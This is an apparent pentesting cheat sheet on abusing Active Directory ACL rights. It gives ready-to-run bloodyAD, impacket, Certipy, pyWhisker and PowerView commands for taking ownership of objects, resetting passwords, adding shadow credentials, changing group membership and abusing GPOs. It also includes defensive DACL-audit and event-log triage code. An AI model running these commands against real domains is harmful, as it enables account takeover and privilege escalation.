# Abuse ACL

<figure><img src="/files/KMxqts5mXGbpW6SqYbpd" alt=""><figcaption><p>From HTB</p></figcaption></figure>

## WriteOwner

The WriteOwner permission is a special ACE that lets a user change the ownership of an object. If WriteOwner is granted on an object, we can change the owner of that object to ourselves or to another account we control. Once we own the object, we gain full control over it, allowing us to:

* Modify its permissions to grant ourselves additional privileges.
* Change sensitive properties, such as resetting the account's password.

In an attack scenario, an attacker with WriteOwner on a user account (such as a privileged account) can take ownership of that account, reset its password, and effectively take over the account to escalate privileges.

{% tabs %}
{% tab title="Remotely" %}
With [impacket-owneredit](https://github.com/fortra/impacket/blob/master/examples/owneredit.py)

{% code overflow="wrap" %}

```bash
owneredit.py -dc-ip <DC> -action write -new-owner <USER> -target '<TARGET/OBJECT>' <DOMAIN>/<USER>:<PASS>
```

{% endcode %}

Or with [bloodyAD](https://github.com/CravateRouge/bloodyAD)

{% code overflow="wrap" %}

```bash
bloodyAD --host <DC> -d <DOMAIN> -u <USER> -p <PASS> set owner <TARGET/OBJECT> <USER>
```

{% endcode %}

Now, to abuse ownership of a group object, we can modify its rights with [impacket-dacledit](https://github.com/fortra/impacket/blob/master/examples/dacledit.py).\
Give the user the WriteMembers permission (allows the user to add or remove members of the target group):

{% code overflow="wrap" %}

```bash
dacledit.py -action 'write' -rights 'WriteMembers' -principal <USER> -target-dn '<groupDistinguidedName>' <DOMAIN>/<USER>:<PASS> -dc-ip <DC>
# dacledit.py 'AAA.BBB'/'alex':'mypass' -action write -rights WriteMembers -principal 'alex' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=AAAA,DC=BBB' -dc-ip 0.0.0.0
```

{% endcode %}

This step effectively grants us any privileges or access rights associated with the target group.

Finally, add members to the group

{% code overflow="wrap" %}

```bash
net rpc group addmem <TargetGroup> <USER> -U <DOMAIN>/<USER>%<PASS> -S <DC>
```

{% endcode %}

and verify that the user was successfully added to the group

{% code overflow="wrap" %}

```bash
net rpc group members <TargetGroup> -U <DOMAIN>/<USER>%<PASS> -S <DC>
```

{% endcode %}

Alternatively, after taking ownership of the object, we can grant ourselves GenericAll and use it to change the user's password.

{% code overflow="wrap" %}

```bash
bloodyAD --host <DC> -d <DOMAIN> -u <USER> -p <PASS> set owner '<VICTIM>' '<ATTACKER>'
bloodyAD --host <DC> -d <DOMAIN> -u <USER> -p <PASS> add genericAll '<VICTIM>' '<ATTACKER>'
bloodyAD --host <DC> -d <DOMAIN> -u <USER> -p <PASS> set password '<VICTIM>' '<NEW_PASSWORD>'
```

{% endcode %}
{% endtab %}
{% endtabs %}

## GenericWrite

GenericWrite access grants the ability to write any non-protected attribute of the target object, including `member` for a group and `servicePrincipalName` for a user.

{% tabs %}
{% tab title="Remotely" %}

#### Remotely 1

With [Certipy](https://github.com/ly4k/Certipy)

{% code overflow="wrap" %}

```bash
certipy shadow auto -username <USER>@<DOMAIN> -p <PASS> -account <TARGET_ACCOUNT> -dc-ip <DC>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
certipy shadow auto -username <USER>@<DOMAIN> -hashes <HASH> -account <TARGET_ACCOUNT> -dc-ip <DC>
```

{% endcode %}

#### Remotely 2

By abusing GenericWrite, we can use [pyWhisker](https://github.com/ShutdownRepo/pywhisker) to add a certificate to the target account as an alternative authentication method.

{% code overflow="wrap" %}

```bash
pywhisker.py -d <DOMAIN> -u <USER> -p <PASS> --target <TARGET_ACCOUNT> --action "add" --dc-ip <DC>
# take note of password
```

{% endcode %}

This certificate can then be used with [gettgtpkinit](https://github.com/dirkjanm/PKINITtools/blob/master/gettgtpkinit.py) to request a Kerberos TGT as the target account, giving control over it.

First, synchronize the clock with the domain controller using `ntpdate` or `rdate`, since Kerberos rejects requests with too much clock skew.

{% code overflow="wrap" %}

```bash
sudo ntpdate <IP_DC>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
gettgtpkinit.py <DOMAIN>/<TARGET_ACCOUNT> -cert-pfx <PFX_FILE> -pfx-pass <PFX_PASS> -dc-ip <DC> <NAME_OUTPUT>
# take note of key
```

{% endcode %}

Then use the TGT to recover the target account's NT hash with [getnthash](https://github.com/dirkjanm/PKINITtools/blob/master/getnthash.py)

{% code overflow="wrap" %}

```bash
export KRB5CCNAME=<NAME_OUTPUT>
getnthash.py -key <KEY> -dc-ip <IP> <DOMAIN>/<TARGET_ACCOUNT>
```

{% endcode %}
{% endtab %}

{% tab title="Locally" %}
{% code overflow="wrap" %}

```powershell
$SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $SecPassword)
$newPassword = ConvertTo-SecureString '<NEW_PASSWORD>' -AsPlainText -Force
```

{% endcode %}

Then reset the target user's password with PowerView ([old](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) and [new](https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1))

{% code overflow="wrap" %}

```powershell
Import-Module .\PowerView.ps1
Set-DomainUserPassword -Identity <TARGET_USER> -AccountPassword $newPassword -Credential $Cred -Verbose
```

{% endcode %}
{% endtab %}
{% endtabs %}

## GenericAll

Full permissions on the object.

### **GenericAll to a user**

{% tabs %}
{% tab title="Remotely" %}
Allows us to modify properties and have control of a user.\
We can reset the password of the user without knowing their current one.

{% code overflow="wrap" %}

```bash
net rpc password <TARGET> <NEW_PASS> -U <DOMAIN>/<USER>%<PASS> -S <DC>
```

{% endcode %}

Or with [bloodyAD](https://github.com/CravateRouge/bloodyAD) (PtH)

{% code overflow="wrap" %}

```bash
bloodyAD --host <IP> -d <DOMAIN> -u <USER> -p <PASS or :HASH> set password "<TARGET>" "<NEW-PASS>"
```

{% endcode %}
{% endtab %}
{% endtabs %}

### **GenericAll to a group**

{% tabs %}
{% tab title="Remotely" %}
Allows us to add members to that group.

{% code overflow="wrap" %}

```bash
net rpc group addmem "<GROUP>" "<UserTarget>" <DOMAIN>/<USER>%<PASS> -S <DC>
```

{% endcode %}

Or with [bloodyAD](https://github.com/CravateRouge/bloodyAD) (PtH)

{% code overflow="wrap" %}

```bash
bloodyAD --host <IP> -d <DOMAIN> -u <USER> -p <PASS or :HASH> add groupMember "<GROUP>" "<UserTarget>"
```

{% endcode %}
{% endtab %}

{% tab title="Locally" %}

```powershell
Net group "<GROUP>" <USER> /add /domain
```

{% code overflow="wrap" %}

```powershell
$SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $SecPassword)
```

{% endcode %}

Then add the member with PowerView ([old](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) and [new](https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1))

{% code overflow="wrap" %}

```powershell
Import-Module .\PowerView.ps1
Add-DomainGroupMember -Identity '<GROUP>' -Members '<TARGET>' -Credential $Cred -Verbose
```

{% endcode %}

Check the group membership

{% code overflow="wrap" %}

```powershell
Get-DomainGroupMember -Identity "<GROUP>" | Select MemberName
```

{% endcode %}
{% endtab %}
{% endtabs %}

### **GenericAll to a GPO**

With [pyGPOAbuse](https://github.com/Hackndo/pyGPOAbuse), add the **`john`** user (Password: **`H4x00r123..`**) to the local administrators group

{% code overflow="wrap" %}

```bash
./pygpoabuse.py <DOMAIN>/<USER> [-hashes :<HASH>] -gpo-id "<GPO-ID>"
```

{% endcode %}

We can also use [SharpGPOAbuse](https://github.com/FSecureLABS/SharpGPOAbuse) on Windows.

{% code overflow="wrap" %}

```powershell
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount <USER> --GPOName "<GPO_NAME>"
```

{% endcode %}

Then force a Group Policy refresh on the target host so the change is applied.

{% code overflow="wrap" %}

```powershell
gpupdate /force
```

{% endcode %}

## ForceChangePassword

{% tabs %}
{% tab title="Remotely" %}
{% code overflow="wrap" %}

```bash
net rpc password <TARGET> <NEW_PASS> -U <DOMAIN>/<USER>%<PASS> -S <DC>
```

{% endcode %}

Or with [bloodyAD](https://github.com/CravateRouge/bloodyAD) (PtH)

{% code overflow="wrap" %}

```bash
bloodyAD --host <IP> -d <DOMAIN> -u <USER> -p <PASS or :HASH> set password "<TARGET>" "<NEW-PASS>"
```

{% endcode %}
{% endtab %}
{% endtabs %}

## AddSelf

Lets the user add themselves as a member of the target group. With [bloodyAD](https://github.com/CravateRouge/bloodyAD)

{% code overflow="wrap" %}

```bash
bloodyAD --host <IP> -d <DOMAIN> -u <USER> -p <PASS or :HASH> add groupMember <GROUP> <USER>
```

{% endcode %}

## [Targeted Kerberoasting](/rednote/pentesting-process/active-directory/kerberoasting.md#targeted-kerberoasting)

With `GenericAll`, `GenericWrite`, `WriteProperty` or `Validated-SPN`.
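To audit which principals actually hold the rights abused in the sections above (WriteOwner, GenericWrite, GenericAll, WriteMembers, AddSelf, ForceChangePassword and SPN writes), here is an added example, not code from this page or from any of the tools it references, that decodes an ACE's access mask and object-type GUID into those primitives. The `ADS_RIGHT_*` bits and the GUIDs are the well-known Active Directory values; the `Ace` class, the `RULES` table and the sample DACL are constructed for the example.

```python
from dataclasses import dataclass

# Well-known ADS_RIGHT_* access-mask bits of an Active Directory ACE.
GENERIC_ALL, GENERIC_WRITE = 0x10000000, 0x40000000
WRITE_DAC, WRITE_OWNER = 0x00040000, 0x00080000
DS_CONTROL_ACCESS, DS_WRITE_PROP, DS_SELF = 0x100, 0x20, 0x8  # extended rights / write property / validated writes
# Well-known schema and extended-right GUIDs that scope an object-specific ACE.
NULL_GUID = "00000000-0000-0000-0000-000000000000"  # unscoped: every attribute and right
MEMBER_ATTR = "bf9679c0-0de6-11d0-a285-00aa003049e2"  # 'member' attribute
SPN_ATTR = "f3a64788-5306-11d1-a9c5-0000f80367c1"  # 'servicePrincipalName' attribute
FORCE_CHANGE_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"  # User-Force-Change-Password
@dataclass
class Ace:  # one allow ACE, constructed for this example
    trustee: str
    mask: int
    object_type: str = NULL_GUID
# (mask bits that grant it, object types the ACE may be scoped to or None for any, primitive)
RULES = [
    (GENERIC_WRITE, None, "GenericWrite"),
    (WRITE_OWNER, None, "WriteOwner"),
    (WRITE_DAC, None, "WriteDacl"),
    (GENERIC_WRITE | DS_WRITE_PROP, {NULL_GUID, MEMBER_ATTR}, "WriteMembers"),
    (GENERIC_WRITE | DS_WRITE_PROP, {NULL_GUID, SPN_ATTR}, "WriteSPN"),  # targeted Kerberoasting
    (DS_SELF, {NULL_GUID, MEMBER_ATTR}, "AddSelf"),
    (DS_CONTROL_ACCESS, {NULL_GUID, FORCE_CHANGE_PASSWORD}, "ForceChangePassword"),
]

def primitives(ace: Ace) -> set:
    """Abuse primitives (as named on this page) that an allow ACE grants its trustee."""
    if ace.mask & GENERIC_ALL:
        return {"GenericAll"}  # full control; implies every rule below
    return {name for bits, scopes, name in RULES
            if ace.mask & bits and (scopes is None or ace.object_type in scopes)}

def dangerous(aces: list, privileged: set) -> dict:
    # Map each trustee outside the expected privileged set to the primitives it holds.
    out = {}
    for ace in aces:
        if ace.trustee not in privileged and (found := primitives(ace)):
            out.setdefault(ace.trustee, set()).update(found)
    return out

# Constructed sample DACL of a group object (not real data).
SAMPLE_DACL = [
    Ace("Domain Admins", GENERIC_ALL),
    Ace("alex", WRITE_OWNER),
    Ace("helpdesk", DS_CONTROL_ACCESS, FORCE_CHANGE_PASSWORD),
    Ace("svc-web", DS_WRITE_PROP, SPN_ATTR),
]
PRIVILEGED = {"Domain Admins", "Enterprise Admins", "SYSTEM"}
```

Running `dangerous(SAMPLE_DACL, PRIVILEGED)` reports `alex` (WriteOwner), `helpdesk` (ForceChangePassword) and `svc-web` (WriteSPN); a real audit feeds it the parsed `nTSecurityDescriptor` of each object and reviews every trustee that is not a sanctioned admin.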

***

## *Other*

### *Modify Attribute*

Read the object's attributes with [bloodyAD](https://github.com/CravateRouge/bloodyAD); here `userAccountControl` shows that the account is disabled.

{% code overflow="wrap" %}

```bash
bloodyAD --host <IP> -d <DOMAIN> -u <USER> -p <PASS> get object "<ex.USER>"
# ...
# userAccountControl: ACCOUNTDISABLE; NORMAL_ACCOUNT        (value:2)
```

{% endcode %}

Then rewrite the attribute, here setting `userAccountControl` to 512 (`NORMAL_ACCOUNT` only), which re-enables the account.

{% code overflow="wrap" %}

```bash
bloodyAD --host <IP> -d <DOMAIN> -u <USER> -p <PASS> set object "<ex.USER>" userAccountControl -v '512'
# ...
# userAccountControl: NORMAL_ACCOUNT
```

{% endcode %}
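Every technique on this page writes an attribute that a domain controller can log, so here is an added example from the defender's side, not code from this page or any tool it references, that triages such events for the writes these sections produce. The event IDs (5136 directory object modified, 4724 password reset, 4728/4732/4756 member added to a security group) and the `EventData` field names are the real Windows ones; the sample events are constructed, and the attribute-to-finding mapping is an assumption of this example.

```python
# 5136 OperationType codes: value added / value deleted.
VALUE_ADDED, VALUE_DELETED = "%%14674", "%%14675"
# Attributes the techniques on this page write, and what a write suggests.
WATCHED_ATTRS = {
    "ntsecuritydescriptor": "owner/DACL rewritten (WriteOwner, WriteDacl, owneredit/dacledit)",
    "member": "group membership changed (WriteMembers, AddSelf, GenericAll on a group)",
    "msds-keycredentiallink": "shadow credential added (GenericWrite: certipy shadow, pywhisker)",
    "serviceprincipalname": "SPN written (targeted Kerberoasting)",
    "useraccountcontrol": "account flags changed (e.g. ACCOUNTDISABLE cleared)",
}
GROUP_ADD_EVENTS = {4728, 4732, 4756}  # member added to a global / local / universal security group
def triage(events: list, expected_admins: set = frozenset()) -> list:
    """Return (event_id, subject, object, finding) for each suspicious write."""
    alerts = []
    for ev in events:
        eid, who = ev["EventID"], ev["SubjectUserName"]
        if who in expected_admins:
            continue  # sanctioned administrators / provisioning accounts
        if eid == 5136:
            attr = ev["AttributeLDAPDisplayName"].lower()
            if attr in WATCHED_ATTRS:
                op = "added" if ev["OperationType"] == VALUE_ADDED else "removed"
                alerts.append((eid, who, ev["ObjectDN"], f"{WATCHED_ATTRS[attr]}; value {op}"))
        elif eid == 4724:  # password reset attempt: no old password needed
            alerts.append((eid, who, ev["TargetUserName"], "password reset (ForceChangePassword / GenericAll)"))
        elif eid in GROUP_ADD_EVENTS:
            alerts.append((eid, who, ev["TargetUserName"], f"member {ev['MemberName']} added"))
    return alerts

def chains(alerts: list) -> dict:
    """Subjects with several distinct findings: one actor walking an ACL chain."""
    by_subject = {}
    for _eid, who, _obj, finding in alerts:
        by_subject.setdefault(who, set()).add(finding)
    return {who: f for who, f in by_subject.items() if len(f) > 1}

# Constructed sample events (not real logs), reduced to the EventData fields used above.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "alex", "ObjectDN": "CN=MANAGEMENT,CN=Users,DC=corp,DC=local",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "alex", "ObjectDN": "CN=svc-web,CN=Users,DC=corp,DC=local",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "bob", "ObjectDN": "CN=bob,CN=Users,DC=corp,DC=local",
     "AttributeLDAPDisplayName": "description", "OperationType": VALUE_ADDED},  # benign edit
    {"EventID": 4724, "SubjectUserName": "alex", "TargetUserName": "bob"},
    {"EventID": 4728, "SubjectUserName": "adm-provision", "TargetUserName": "MANAGEMENT",
     "MemberName": "CN=carol,CN=Users,DC=corp,DC=local"},
]
```

Event 5136 is only emitted when the "Audit Directory Service Changes" subcategory is enabled and the objects carry a SACL for the write, so check both before relying on it. On the sample, `chains(triage(SAMPLE_EVENTS))` singles out `alex`, who rewrote a DACL, added a shadow credential and reset a password in one sequence.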
